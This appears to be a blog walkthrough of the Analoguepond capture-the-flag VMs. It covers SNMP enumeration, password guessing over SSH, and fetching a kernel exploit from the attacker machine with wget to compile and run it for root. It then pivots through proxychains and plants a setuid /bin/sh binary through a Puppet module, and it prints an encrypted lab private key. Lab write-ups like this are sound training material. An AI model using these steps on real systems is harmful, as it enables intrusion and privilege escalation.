Mr_H4sh

Infosec, CTF and more

Analougepond Solution

In this post I’m going to show you how to solve the Analoguepond VM provided by knightmare.

You can find the VM on this link

The goal of the VM is to gain root access on 3 machines to the machine and capture the flags mentioned in the description of the VM.

Attacker: 192.168.56.1
Victim: 192.168.56.101

I run nmap in TCP, and I find the port 22 open. I run nmap in UDP, and I find the port 161 open.

I use onesixtyone to see which could be the communities of the snmp on the system, and I find that the “public” community is available:

$ onesixtyone -c community 192.168.56.101
Scanning 1 hosts, 2 communities
192.168.56.101 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

Then I use snmpwalk to get the info with the public community:

$ snmpwalk -Os -c public -v 1 192.168.56.101
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (81059) 0:13:30.59
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (81951) 0:13:39.51
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 04 12 11 38 0A 00 2B 01 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

Ok, so we have a user called eric, and from the snmpwalk we find the following sentence:

iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."

I google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.

I ssh within the box using the credentials eric:therisingsun, and I’m in:

$ ssh eric@192.168.56.101
eric@192.168.56.101's password: therisingsun
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 18 17:42:38 BST 2017

  System load: 0.0               Memory usage: 1%   Processes:       79
  Usage of /:  80.7% of 5.39GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/
eric@analoguepond:~$ 

I check to escalate privileges on this machine, and I find out that a version of Ubuntu 14.04 is running:

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
eric@analoguepond:~$ cat /etc/issue
Ubuntu 14.04.5 LTS  
 
 My IP:  192.168.56.101 

eric@analoguepond:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

I see that the following exploit allows me to escalate privileges as root user:

eric@analoguepond:~$ wget http://192.168.56.1/39166.c
--2017-04-18 19:46:55--  http://192.168.56.1/39166.c
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2793 (2.7K) [text/x-c]
Saving to: ‘39166.c’

100%[================================================================================================================================================================================================================================>] 2,793       --.-K/s   in 0s      

2017-04-18 19:46:55 (270 MB/s) - ‘39166.c’ saved [2793/2793]

eric@analoguepond:~$ gcc -o exploit 39166.c 
eric@analoguepond:~$ ./exploit 
root@analoguepond:~# whoami
root
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
root@analoguepond:~# 

So, I get the first troll flag:

root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Time to go ahead.

I see that the host is also connected to another network interface on 192.168.122.x, so I run a ping to all the machines within the range 192.168.122.1-254, and I get the following IPs: 192.168.122.3

From the processes running I see that one of the machines is called barringsbank, so I go to /etc/libvirt/qemu/ and I find the xml file with the specs of the VM, and I find the following description for the VM, plus the VNC password:

root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml 
[...]
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
[...]
  <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>

The other VM is called puppet, and same thing as above:

[...]
<description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
[...]
<graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>

I see that the VMs IPs are the following:

root@analoguepond:/etc/libvirt/qemu/networks# cat default.xml 
[<network>
    <name>default</name>
    <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
    <forward mode='nat'/>
  ]  <bridge name='virbr0' stp='on' delay='0'/>
  <mac address='52:54:00:b2:23:25'/>
  <ip address='192.168.122.1' netmask='255.255.255.0'>
    <dhcp>
      <range start='192.168.122.10' end='192.168.122.15'/>
      <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
      <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
    </dhcp>
  </ip>
</network>

I can see it from the arp:

root@analoguepond:/root# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.1             ether   0a:00:27:00:00:00   C                     eth0
barringsbank.example.co  ether   52:54:00:6d:93:6a   C                     virbr0
puppet.example.com       ether   52:54:00:5b:05:f7   C                     virbr0

And also from the /etc/hosts file:

root@analoguepond:~# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	analoguepond.example.com
192.168.122.2	puppet.example.com
192.168.122.3	barringsbank.example.com

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

I check the local connections and I see that the VM has VNC running on the machine, so I allow the access from the outside world to connect on port 5900:

root@analoguepond:/etc/libvirt/qemu# netstat -tulp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:domain    *:*                     LISTEN      1154/dnsmasq    
tcp        0      0 *:ssh                   *:*                     LISTEN      867/sshd        
tcp        0      0 localhost:5900          *:*                     LISTEN      1161/qemu-system-x8
tcp        0      0 localhost:5901          *:*                     LISTEN      1223/qemu-system-x8
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      867/sshd        
udp        0      0 *:17303                 *:*                                 522/dhclient    
udp        0      0 192.168.122.1:domain    *:*                                 1154/dnsmasq    
udp        0      0 *:bootps                *:*                                 1154/dnsmasq    
udp        0      0 *:bootpc                *:*                                 522/dhclient    
udp        0      0 *:snmp                  *:*                                 943/snmpd       
udp        0      0 *:57563                 *:*                                 943/snmpd       
udp6       0      0 [::]:55245              [::]:*                              522/dhclient    
udp6       0      0 localhost:snmp          [::]:*                              943/snmpd    

This is not accessible from the outside world though.

I setup proxychains to scan the other hosts ports:

$ ssh -NfD 1234 eric@192.168.56.101
eric@192.168.56.101's password:

$ proxychains nmap -sT -Pn -n -v 192.168.122.2
[...]
<--timeout
|S-chain|-<>-127.0.0.1:1234-<><>-192.168.122.2:2968-channel 3: open failed: connect failed: Connection refused
<--timeout
Completed Connect Scan at 22:17, 0.61s elapsed (1000 total ports)
Nmap scan report for 192.168.122.2
Host is up (0.00052s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

$ proxychains nmap -Pn -n -v 192.168.122.3
<--timeout
|S-chain|-<>-127.0.0.1:1234-<><>-192.168.122.3:9593-channel 3: open failed: connect failed: Connection refused
<--timeout
Completed Connect Scan at 22:31, 1.03s elapsed (1000 total ports)
Nmap scan report for 192.168.122.3
Host is up (0.00094s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

I ssh into the IP 192.168.122.2 and this is what I get:

root@analoguepond:/root# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+
root@192.168.122.2's password: 

Ok, as I see from the wikipedia page, Sandie Shaw’s most famous song is Puppet on a String. Now, the machine is called puppet, it must be it. The hint says removing spaces helps, so I try puppetonastring and it works:

root@analoguepond:/root# ssh sandieshaw@192.168.122.2
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+
sandieshaw@192.168.122.2's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sandieshaw@puppet:~$ id
uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
sandieshaw@puppet:~$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 52:54:00:5b:05:f7  
          inet addr:192.168.122.2  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe5b:5f7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47654 errors:0 dropped:77 overruns:0 frame:0
          TX packets:47428 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3727680 (3.7 MB)  TX bytes:2761655 (2.7 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:898 errors:0 dropped:0 overruns:0 frame:0
          TX packets:898 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1412896 (1.4 MB)  TX bytes:1412896 (1.4 MB)

sandieshaw@puppet:~$ 

I wander around a bit, and I find out through the Puppet configuration that the machine with the IP 192.168.122.3 has the following users:

sandieshaw@puppet:/etc/puppet/modules/vulnhub/files$ cat barringsbank-passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false

And that the users have to ssh with their public key:

sandieshaw@puppet:/etc/puppet/modules/vulnhub/files$ cat sshd_config 
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin without-password
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile	%h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding no
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

I wander around for a privilege escalation, and I find the file /tmp/spin with SUID bit. I run it and it’s just a spin.

sandieshaw@puppet:/tmp$ find / -perm -4000 2>/dev/null
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/gpasswd
/usr/bin/passwd
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping6
/bin/su
/bin/ping
/tmp/spin

I check again the puppet folder, I find the source code of the “spin.c” in the module for the puppet machine (192.168.122.2):

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -la
total 732
drwxrwxr-x 2 root       sandieshaw   4096 Dec 21 22:04 .
drwxr-xr-x 4 root       root         4096 Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw 733480 Dec 21 21:12 spin
-rw-rw-r-- 1 sandieshaw sandieshaw    376 Dec 17 11:52 spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c 
#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

Guess what? The owner of the source code and of the executable is sandieshaw. As I can see in /etc/puppet/modules/wiggle/manifests/init.pp, the file /tmp/spin needs to be present:

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }


}

So, I create another executable and upload it in the same folder:

root@analoguepond:~# cat c_shell.c 
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/sh");  
}
root@analoguepond:~# gcc -o spin c_shell.c
root@analoguepond:~# scp spin sandieshaw@192.168.122.2:/etc/puppet/modules/wiggle/files/spin
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+
sandieshaw@192.168.122.2's password: 
spin                                                           

So, now I make sure that the binary is there, and I run puppet agent to update the spin file:

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -la
total 744
drwxrwxr-x 2 root       sandieshaw   4096 Apr 19 01:36 .
drwxr-xr-x 4 root       root         4096 Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw   8627 Apr 19 01:36 spin
-rwxrwxr-x 1 sandieshaw sandieshaw 733480 Dec 21 21:12 spin2
-rw-rw-r-- 1 sandieshaw sandieshaw    376 Dec 17 11:52 spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ./spin
$ id
uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
$ exit
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ puppet agent
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -la /tmp/
total 20
drwxrwxrwt  2 root root 4096 Apr 19 01:42 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root 8627 Apr 19 01:41 spin
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ /tmp/spin
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)

Got root :D

So, I check the /root folder, and this is what I find:

root@puppet:/etc/puppet/modules/wiggle/files# cd /root
root@puppet:/root# ls -la
total 24
drwx------  4 root root 4096 Jan  7 17:49 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
drwxr-xr-x  3 root root 4096 Dec 21 23:20 protovision
drwx------  2 root root 4096 Dec 21 23:19 .ssh
root@puppet:/root# cd .ssh
root@puppet:/root/.ssh# ls -la
total 8
drwx------ 2 root root 4096 Dec 21 23:19 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
root@puppet:/root/.ssh# cd ..
root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls -la
total 12
-rw-r--r-- 1 root root 401 Dec 21 22:15 flag1.txt.0xff
-rw-r--r-- 1 root root  39 Dec 17 12:51 jim
-rw-r--r-- 1 root root  53 Dec 17 12:51 melvin
root@puppet:/root/protovision# cat flag1.txt.0xff 
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
root@puppet:/root/protovision# cat jim 
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin 
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# 

These are sentences from “War Games”, and old movie.

The string 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861 is in Hexadecimal, I convert it to base64 and I find the string ==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHa. Reversing the string I find a base64 string: aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dGVzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg==. This is the decoded string from base64:

https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

I also find some files in the folder /root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z

I manage to decrypt the message due to the hint of jim, the password is secrets:

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat /root/protovision/jim
Mr Potato Head! Backdoors are not a...

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z#gpg --output nleeson_key --decrypt nleeson_key.gpg
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls -la
total 20
drwxr-xr-x 2 root root 4096 Apr 19 02:12 .
drwxr-xr-x 3 root root 4096 Dec 18 18:42 ..
---x------ 1 root root    7 Dec 18 15:34 my_world_you_are_persistent_try
-rw-rw-r-- 1 root root 1766 Apr 19 02:12 nleeson_key
-rw-r--r-- 1 root root 1420 Dec 21 22:10 nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat nleeson_key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16

RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
/6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
+w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
